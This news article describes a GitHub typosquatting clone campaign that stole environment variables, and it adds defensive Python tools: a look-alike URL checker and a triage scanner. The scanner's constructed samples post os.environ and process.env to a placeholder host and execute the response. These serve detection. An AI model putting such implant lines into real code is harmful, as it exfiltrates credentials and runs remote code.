
GitHub Users Targeted in Supply Chain Attack

This morning a significant software supply chain attack was discovered on GitHub. The attack was contained before it could spread further, but it makes the ramifications of supply chain attacks clear and serious.

The attack was carried out on GitHub, the most widely used code hosting platform, with more than 83 million developers across the globe. GitHub hosts Git repositories in which developers track and control the source code they store there, and its users form the largest coding community in the world.

“This morning, a malicious repository cloning campaign was identified on GitHub. The attackers used typosquatting techniques to clone and re-publish popular repositories under fake account names mimicking the original ones, adding extra commits with malicious code. The goal of the attackers was to steal environment variables and, in some cases, even enable backdoors to machines.

This attack highlights again how easy it is to conduct supply chain attacks. These types of attacks are spreading wide on open source channels, from NPM and PyPI to now GitHub. At Check Point, our mission is to keep your development safe against supply chain attacks and threats,” says Lotem Finkelsteen, Head of Threat Intelligence at Check Point Software.


What is GitHub?

GitHub lets developers collaborate on code repositories: other developers can contribute to code that is not their own, while the owner of the original code keeps full control over whether to accept or reject changes proposed by other members of the community.

It is common for developers to download code repositories and use the code in their own applications.

When a developer wants to make significant changes to another developer's code, they take a copy of the repository. Git's clone operation produces an exact copy of someone else's code, including its full commit history, while the original stays untouched under the control of its author and keeps its existing signals of legitimacy such as stars, forks, contributors and watchers. A clone that is pushed to GitHub under a new account is a brand-new repository with none of those signals and, unlike a GitHub fork, it carries no visible link back to the repository it was copied from; only the name and the code resemble the original.
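Because a re-published clone looks like the original in everything but its owner name, one cheap check a project can run over its dependency list is to compare every GitHub URL it pulls from against an allow-list of the repositories it actually reviewed and to flag owner or repository names that are a character or two away from an allow-listed one. The following is an added example written for this article, not code from GitHub or from any affected project; the allow-list entries, the `example-org` account and the sample URLs are constructed for illustration.

```python
"""Flag dependency URLs that point at look-alike GitHub accounts or repos.

Added example for this article, not code from GitHub or any project it
mentions. CANONICAL is a hypothetical allow-list; in practice it comes
from your own review of the projects you depend on.
"""
import re
from typing import Optional, Tuple

# Hypothetical allow-list of reviewed "owner/repo" pairs (lower-case).
CANONICAL = {
    "example-org/widget-lib",
    "example-org/crypto-utils",
}

# Accepts https://, git+https:// and git@ forms, with optional .git,
# trailing slash, and @ref or #fragment suffixes.
GITHUB_RE = re.compile(
    r"^(?:git\+)?(?:https?://|git@)github\.com[:/]"
    r"([^/]+)/([^/#@]+?)(?:\.git)?/?(?:[@#].*)?$"
)


def parse_github(url: str) -> Optional[Tuple[str, str]]:
    """Return (owner, repo) in lower case for a GitHub URL, else None."""
    m = GITHUB_RE.match(url.strip())
    return (m.group(1).lower(), m.group(2).lower()) if m else None


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; used to catch one- or two-character look-alikes."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # delete ca
                           cur[j - 1] + 1,         # insert cb
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]


def classify(url: str, canonical=CANONICAL, max_dist: int = 2) -> str:
    """'ok' for an allow-listed repo; 'lookalike' when both owner and repo
    are within max_dist edits of an allow-listed pair but the pair is not
    identical; 'unknown' for anything else (non-GitHub or unrelated)."""
    parsed = parse_github(url)
    if parsed is None:
        return "unknown"
    owner, repo = parsed
    if f"{owner}/{repo}" in canonical:
        return "ok"
    for entry in canonical:
        c_owner, c_repo = entry.split("/", 1)
        if (edit_distance(owner, c_owner) <= max_dist
                and edit_distance(repo, c_repo) <= max_dist):
            return "lookalike"
    return "unknown"


if __name__ == "__main__":
    # Constructed sample dependency URLs; "exampIe-org" uses a capital I
    # in place of the l, the kind of swap a typosquatter relies on.
    for dep in [
        "https://github.com/example-org/widget-lib",
        "git+https://github.com/example-org/widget-lib.git@deadbeef",
        "https://github.com/exampIe-org/widget-lib",
        "https://github.com/example-org/widget-libs",
        "https://github.com/someone-else/other-project",
    ]:
        print(f"{classify(dep):10} {dep}")
```

A `lookalike` verdict is a prompt to open the repository page and compare stars, forks, contributor history and the commit log against the project you meant to use; an `unknown` verdict simply means the dependency has not been reviewed yet. The distance threshold is a tuning knob: 2 catches the common single-character swaps and added letters without flagging every short name on GitHub.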


What actually happened?

Recently, a malicious actor cloned upwards of 35,000 GitHub repositories and kept them identical to the original source code apart from the malicious code they added. That code fingerprinted the environment in which it ran, collecting details such as the identity of the device and of the user, and stole environment variables, which commonly hold credentials, API keys and other secrets.

More significantly, the implant could download and run additional malware from a third-party site. That second-stage malware could then compromise any application or environment that had built in code taken from the weaponized clones on GitHub.
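The two behaviours described above, reading the environment and sending it out, and pulling code from a remote site and executing it, are what a reviewer should look for when triaging a checkout whose provenance is in doubt. The scanner below is an added example written for this article, not code from any affected repository; the token patterns are a hand-picked set covering Python, Node, Go, Perl and Java idioms, and the three sample files are constructed, with `example.invalid` as the placeholder collection host. It anchors on each line that makes a network call and looks one line either side for environment access or dynamic execution, which surfaces candidates for human review rather than proving anything on its own.

```python
"""Triage scanner for the env-exfiltration / remote-eval pattern.

Added example for this article, not code from any real repository.
The regexes and the sample files are constructed for illustration.
"""
import re
from typing import Dict, List, Tuple

# Environment access (Python, Node, Go, Perl, Java).
ENV_RE = re.compile(
    r"os\.environ|os\.getenv\(|process\.env|os\.Environ\(\)|\$ENV\{|System\.getenv"
)
# Outbound network calls in the same languages.
NET_RE = re.compile(
    r"requests\.\w+\(|urlopen\(|\bfetch\(|http\.(?:Post|Get|NewRequest)\("
    r"|XMLHttpRequest|socket\.connect"
)
# Dynamic code or process execution.
EVAL_RE = re.compile(r"\beval\b|\bexec\b|child_process|subprocess\.|os\.system\(")

Finding = Tuple[int, str]  # (1-based line of the network call, kind)


def scan_source(text: str, radius: int = 1) -> List[Finding]:
    """For every line with a network call, inspect `radius` lines on each
    side. Environment access nearby is reported as env-exfiltration;
    eval/exec nearby as remote-code-execution."""
    lines = text.splitlines()
    findings: List[Finding] = []
    for i, line in enumerate(lines):
        if not NET_RE.search(line):
            continue
        lo, hi = max(0, i - radius), min(len(lines), i + radius + 1)
        neighbourhood = "\n".join(lines[lo:hi])
        if ENV_RE.search(neighbourhood):
            findings.append((i + 1, "env-exfiltration"))
        if EVAL_RE.search(neighbourhood):
            findings.append((i + 1, "remote-code-execution"))
    return findings


def scan_many(files: Dict[str, str]) -> Dict[str, List[Finding]]:
    """Scan a {filename: contents} mapping; keep only files with findings."""
    report: Dict[str, List[Finding]] = {}
    for name, text in files.items():
        hits = scan_source(text)
        if hits:
            report[name] = hits
    return report


# Constructed samples (not taken from any real repository).
IMPLANT_PY = """\
import os, requests

def setup():
    resp = requests.post("https://example.invalid/collect", data=dict(os.environ))
    exec(resp.text)
"""

IMPLANT_JS = """\
const env = JSON.stringify(process.env);
fetch("https://example.invalid/c", {method: "POST", body: env}).then(r => r.text()).then(eval);
"""

BENIGN_PY = """\
import os
import requests

DEBUG = os.getenv("DEBUG", "0")

def download(url):
    # ordinary outbound call with no environment data attached
    return requests.get(url, timeout=10).text
"""

if __name__ == "__main__":
    samples = {"setup.py": IMPLANT_PY, "index.js": IMPLANT_JS, "client.py": BENIGN_PY}
    for name, hits in scan_many(samples).items():
        for line_no, kind in hits:
            print(f"{name}:{line_no}: {kind}")
```

Run against a real checkout by reading each file into the mapping passed to `scan_many`. A hit on the benign pattern (a configuration read far from any network call) is avoided by the one-line radius; widening the radius trades false positives for coverage of implants that spread the two halves further apart, so treat the output as a review queue, not a verdict.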

Developers identified the malicious implant in code downloaded from GitHub, and the community's first fear was that the original repositories themselves had been infected. Further research showed that the infected code came from clones, downloaded in the belief that they were the original, non-malicious repositories.

The implications for the software supply chain are potentially catastrophic: an unsuspecting developer mistakenly downloads a cloned repository that carries malicious code, builds it into their own project, and then unknowingly ships malware to their own users.


How to prevent supply chain attacks

The practice of shifting security "left" and giving DevOps teams automated tools that bake security into their pipelines is not new, but adoption is slow. This attempt to compromise an enormous number of environments and applications is a clear example of why supply chain security is critical.

Check Point CloudGuard includes automated security tools for developers to ensure that all code is written with security in mind. It scans infrastructure-as-code and source code to eliminate threats at the earliest phase.


(Disclaimer – The article contains some material that is meant for publicising the tools available with Check Point and as publishers we are providing the information without any bias towards or away from the brand or the products)
